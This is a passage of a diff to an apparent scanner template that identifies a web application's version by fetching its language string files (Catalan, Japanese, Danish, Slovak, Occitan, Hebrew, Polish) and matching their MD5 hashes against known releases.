+ dsl: + - "(\"3f82087a9fd75b559a7cc7ef18157a7b\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"2e47e58257394b655b8ec6250431e5cb\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.18.1 + dsl: + - "(\"4e810e9d45f5778e1605692b6de9a867\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"dc553c50021064e35660996a634e8ea8\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"14c1223a88ac131dfb165d17c23a838d\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"cc940b9b020518f8b9236866e0a36e20\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"8c47c7a8a2b911eddc92351df7c8be94\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"98bbdbdad337068b82d92d33ad180cea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.9.1 + dsl: + - "(\"3cb79c78078373c43037796cf993d889\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"d8c95a008d25dbda05c37818004b9b59\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ea84daaece86c922fb24616804380193\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"934da71928b460dc55f5da04f2185470\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"f96a3462e92c549e3ee8ad57f62c1bae\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"1ecccb4604a06647463a6ed9ec050fe9\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f7075fa6697e2a9d8ec9ace2c5282a4d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ed425bd79f31377d8ac459213563c87c\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"0e4dd5956de8a8d69ee88825469afc0b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"59fd17c808213faa26dfefd2399988a4\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"d9676c816a8cf70f353f579483df6993\" == md5(body))" + - type: dsl + name: 
1.2.17 + dsl: + - "(\"4ed33f40279f6ee1e139e429ee7e6a1b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"19c5916498018dbdb088e93049671407\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a1fdb062a3b355fa7601d213a6afb2fd\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"d861a2964f5ecff054bd9a79f78f610b\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"285a6538c5f7b662b720a3d9c9f54210\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"efc04df18113b13b06e2b8d0f6d3b711\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0e6af1133f8ffccbdc05af197531cc95\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0acb39cc965c577fbc9f8a8af81ee2b6\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"eb1fd49f07df03fc3931936c7d204f89\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"99d6560de812b125c9cb13d51bf26673\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"db295f066e9c4d552308ee95d233bfed\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"a2cae1c35b7ee7c27e90ecb85e7f51ce\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"f564f7749b36076cb73ca3680157c3aa\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"f6bef6ae57c674925bc7c1ef7b37c00c\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"a7513aa8d6878f32184ba96cacf653d1\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"fccf34d3d37eb1191d2e1286e1d58a86\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"46f04d84a13649d5c3600717eb10e582\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"a33dc7cbeb3e9339ff8693400fa28d8c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"b46210c83c4cf504df5f6bf9b3f4add4\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"b7682f069013901d15e50fc09835f5b1\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - 
"(\"147cd0f8250b48f110355b83ac9d3413\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"3e5e3438c6660c6658e5873f639e0e1c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"8bb063656e08eb9d5b8d6e13b2b1eadb\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"4a691fc1966e7303769e0afd6c826962\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"8a65cf87e6c7242149cdf46d3a2f25f8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.11.1 + dsl: + - "(\"c13c1338ec31d25381ec0ffc5807c301\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"1aef5ab42a65be8d6328832345296d82\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"26ac0412557b6849299580998f2cfc5d\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"e9016bd0c23c71240d1c66efd44147fa\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"a4fd71147599c75a8c9d739a78ca06f4\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"12d6e5a5368bd5bf91d2517faf5823b6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"24b5874e1399b04f5b1a54fddcc83c63\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8891573214d57bd7a76e58d7c88a92b0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"291b17fc99c3f42ef487ed3f66715a26\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"62a2250f7e053d63c96e9480757f8850\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"582873db5ab0f53a1b644662aa75058d\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"bf47cd25e313888c9911826fc526835d\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"bbf27b021b48646414846101c39c633c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"fd092635048b42f42cf0b93571da1a15\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - 
"(\"ea453f14f4183c43a08025e7d5c797e1\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"a317d365a0f5006f631c3ea83f9bc465\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6e96b35cf89b629fe929f44b2ba32113\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"30e871f2a98bf92cdb1fed1d0f8ea1bc\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"8ab63838694c87b031d8b8b105a70f32\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ca2a6cb6706beb92fc2abde3559902c5\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"17b41e75a64d4ca3fae70f8fb9ddbb13\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"5a1237b5106071fa57091fd7198f5bfd\" == md5(body))" + - type: dsl + name: 1.1.4 + dsl: + - "(\"f37c58fb969de3546e3a44edfd3f1a9f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.3 + dsl: + - "(\"be6479322769eb7ab90fbbc81605536d\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a333262b9d6dcd1ea5dd81195f7fbcdd\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"22ee048b63eb282a98bc3f80b6fed84f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"7437f70a6a005b0204bbf01a7e692f93\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"7cc5c0d55ad12f28bd187f278d2f86dd\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"590c99952a0de4e5ab5e8544bb07661b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"f70553a8bcc8fcf48460bee428cfeb6b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"2744368571a3a71e31b51e0b8e12d153\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"420fc622e18bea28b0223616cc0d75a4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.6.0 + dsl: + - "(\"eaf3645ca04e5baf726aa986f9a8ef0e\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - 
"(\"5af0b35751b09f571f6093746cb67bb0\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"daa351395b24eb0aa2a252e969d5b770\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"ec84f962e7da0534d22663237ec6c97b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8b3518a91f90b92c4034d3a592d9151b\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8c68a576e968cfc2d0e2cbb144a4ec19\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"1f4b70cf0e0429240091aed377364f92\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"212a745fb4c1f87bdb7099a491ed834a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3dca6c95850eac1d65863ab9fac076cf\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0d21722b99d1e59c0d16edb1605e5f9c\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"221300a986c9f5307b83119a4b8852e2\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"95eeee04b1e13040f7403508ad061cc3\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"d3987500d953f917d786aee51924b40a\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a969366456d5bb251197f096f28a6526\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"7ec4986e4110da8e81b2188139b77d20\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"fc6e50d5b6f6747c46745f53e89e8033\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"be755a670d5f5a56ef1ee8d7a043d852\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"0c52851da6e7436907703eea30116607\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"28befc59aa6fa4e04ecb5a9c790a0847\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"04950fe098b46ae6c4a58834afe462aa\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"4c0809eeb0788e35610d279b86424c18\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"e97aeed7f0296dd1da92621e5baa25b5\" == 
md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"fc8a8b3e95553acc3027bac792c91d3c\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"3d28864340611ce208f6008f17f5d550\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"f8275a4f07f6fdd204c0e43e6479c4b1\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"5d46140c175c60c3f5d21901e394594e\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"3455a72333dfd4497e90be688ba26625\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"c3b7b8a5a347fd17b2f694e2164de39e\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"102de544712586270814e56e311d6883\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"d72c8bf54f8bf5e45eb65bcc6e1ae4e9\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"e46470bd256e0f97a766a7d89a429e88\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"5c080562ff33151fa3a08ad966cb475b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3f931cfa3fcdebaaf534367e40495a5f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d848366c69f9a96ba233dccd4764e84a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"f97438d48213a1b13f85f47ee33b0cae\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"cb43316d87d72562a27118ef58425611\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"f2d91bda23e34352ea4e90d3bf69c8cb\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"ab082526b97700734b01d34fe69d7bf5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"11653f61380b6a1cb70584a60c32c323\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"267437b770572a9232d30ef6f088e9fe\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - 
"(\"f89ffafd5683bae3295620d38b4a2b6f\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"94a3b113d3b37d1e23c8b5e229b7b448\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"14c3dda2b8896ccbe79bbfe1aec83580\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4f289b5e6bd3629dba79c779b17258a0\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"bea98a0f6c648ab7239f45ed36a169f2\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"c9d36ead499466f74f0bf9eb078d69a4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"08097c0ee5f93b649a550a70ca99cbb0\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e2d3ec35f802179ece1c2d2137cff601\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"cc89e3d5f31aefbae01017316611413d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"fd3928a617abaed4a849fd5b5e5ae225\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"90662ef82a5ffb650b53cfca357663c7\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"75b651a8db3205dc32729ce0302a92e4\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"560c2028f99229a971b715dfcdd7bfa3\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"aa2668a2ea708030a0b857a0a216e6b9\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"5c6a38551c98a611478d666444c0fc68\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"e3b73bd85bc419301a1cdae0b5bbb1a1\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"e13af38756f38d766e5aa40771d64da3\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ead7b72101e683a65263470e6be28122\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"83b103dbfe5e7a84a77865685d3ba47b\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"8866c34a87c5da2498386f070592b010\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - 
"(\"f21da27995c24fb6703015aa4c10923b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"9badd1d6620ad387b31d0f41853f990d\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"8ea8ccce9a722abaf31aa2f21f7f04ed\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"db6544c0faec37f8155172a0d027e85c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"fa4f637905fbf7bc99fc718498588ee1\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"35d3853e396e07b0c809922d07689a6e\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"13c86d7a2226ab16003ba9bc80496ddd\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"254df48d9a7a6d8207f87e45a88b49a4\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"9addcd6d6dba324e05e45eed6a2e9adb\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"01b6175b1231f7276c862018df2cc475\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"fb0c6a9dc40228a959b6879451a26c98\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9328816e32536e6e50cde5e119acd860\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"1219d1d6b5a67b7b7ce274a91140097b\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"0ef384317ed71f8cbad974a30a16cdb1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c321e840de377ac462e2e893eb54d6aa\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"d8398d1a7b591aea884662666fa0f5a2\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e9bacf19e8d0a1145a1dc4c95abaa299\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"cd09412d0aa8302a9378eac3bc64246d\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"a72fa053e9064244794f9d8cdf9bef44\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"06e2ac3381e787a526ccaf471c23da72\" 
== md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5809689c7cf934fb33e8dd925ebc0f1a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"768cc3b757998b8a9a342de466ab0566\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"2cc425d12e245fc177ce29b7a718659c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"8313d97d64a170e66f52e06d1074ce44\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"7494d0055a8dfc67b1d5c87c37508efd\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"e042344a2dec8c9a90692e7c7f245695\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"71fbcabb549037667e03bc67051322a2\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"bba2067c5583175d7caa140f04dce775\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.11.1 + dsl: + - "(\"522264695bd0f78a8dd68d60e1961b91\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"c03b02018a691214e8339068bfadbb20\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"fd21856873dbe59311fdb01cbd560df4\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"5bc88498f86a6df55d64fd7284259a2b\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"b6bca3b230705715770e834f3b41a125\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"d6868fda773cb604e92d1e4680bf890e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"de138cf9480d5c0f1f6d798443b76dfb\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"6ba72565383f8af1d62326152fd47036\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"4eeafa16646b88867cd7693339267464\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"f25b1715d3880346a6e8515caebeecbf\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"c8053471a64735af7c2b0c99e823bd5a\" == md5(body))" + 
- type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"5075cfbd5a048ec5291550f63610df01\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"89daa8b56b7e9bc2640fbc878f821ced\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f39b7081d81adf00cd249d0731a1f85f\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"4f8031c89961e20ba71ac39a1c8a17b2\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"fd4ef48e4b57fcb980dd035f88f951c6\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"be3e045ddc44fa5984d9d43bfd927bac\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"6917489f024182b8f90e93b050780788\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"7b4261eabf215fea11c44794153df2d6\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"8f6001ca3047738453954e5a9e234909\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"102ed63d7a7c7cac2f67cc6e46c84402\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"ff66de56190e24b10f530cf5de727561\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"a1921884b3f0a4f9cbdc8be42ce29519\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"5f69a2d6ea813d298460f5dccf3acc00\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"3b4f7230835fd1883f793d2abbe9d8bf\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"959c46b4aebd60f35768220f0282e051\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"6b7bbd4050293931d2d3c44ef9c58ef4\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"994c586fe8de49038b17b8afdd074184\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"48fa8784d830d0a28e59a1e86a8c9422\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"13d3a569e61cae28a7a90bae60beb52e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.5.0 - 
2.6.0 + dsl: + - "(\"c13e50d86d799bbd3d47daabf11d2911\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"e91a04403184adf4ef7c35bb33f2e5f7\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"19f5d4739eb3fe6902760644c4449b61\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"51be9dad346211de97b6226e1a641728\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"fdee07b04674cbb742d60988d8e7954f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"99e8da2fa93aa79bf23f0b8af67324d2\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"630ca5050b386b11d65a21e74464a4b9\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"761fd6c6e7b0f3501fd57a6f94145e0a\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"2eeaf8306a6cad71fd50b65c38d396c3\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"6e43ce32feb4efb0f3563782766b3c40\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"6bc308950f3d8ddd36ff3f7fe797b0af\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1f3fe971b07ed36a6a7084e8d11bd307\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"6c16ca71cd35327615615fc1056ca487\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a80d50b80b0f70ed5e7c87306bf7ef65\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"293cae10ce115db81db7fb018e26c067\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"c39e852dc0e27e02aa64ea349d870aa9\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"bcfed501c99d8703d18f35bcb87f4b28\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"73a69c40eadd87dd3f3be51414702de1\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"f98bcf640a636d401b9a9e9bc3613c4d\" == md5(body))" + - type: dsl + name: 1.1.8 - 1.1.9 + dsl: + - "(\"1d2e71280a91b54ca885a73fb6325a11\" == md5(body))" + - type: dsl + name: 1.1.7 + dsl: + - 
"(\"8bc9ca4d036462e288fec2a8b4840476\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"212588b900aab990e30d99163ed0d3bf\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"a759eedf61d8e25507604c5321b0dd0a\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"f3f31222a421ea2729bc480338e0ad31\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"61dde261d83334fc12bae69816aefc8b\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"f629b9785f332fc07bafec8e07f8f52d\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"2f461b52bcd82588db465a74ae6dfc51\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.11.1 + dsl: + - "(\"1ba19195c3cf155c60e65332a91e4f8c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"4a2e4b82569ad9b68d613fa012cb8ea4\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"fd0546a674d6dcb878ce4a886e6aaae2\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"ebc5b79f4e6a8f867b6acbe5c1715ddd\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"c8d4784099af986e81b39f660ca2df81\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"ad5c90fc05db54fa22bfafa734a3cf1e\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"f31aeadf1cfd6a9508c9836bf5b62957\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"330e43fc980f6590e0d7f13ff01c141e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"ee2d0253b29146a495005c97bb15ac5e\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"13f080eb4475da55ca849d4ebdd96fdf\" == md5(body))" + + - method: GET + path: + - 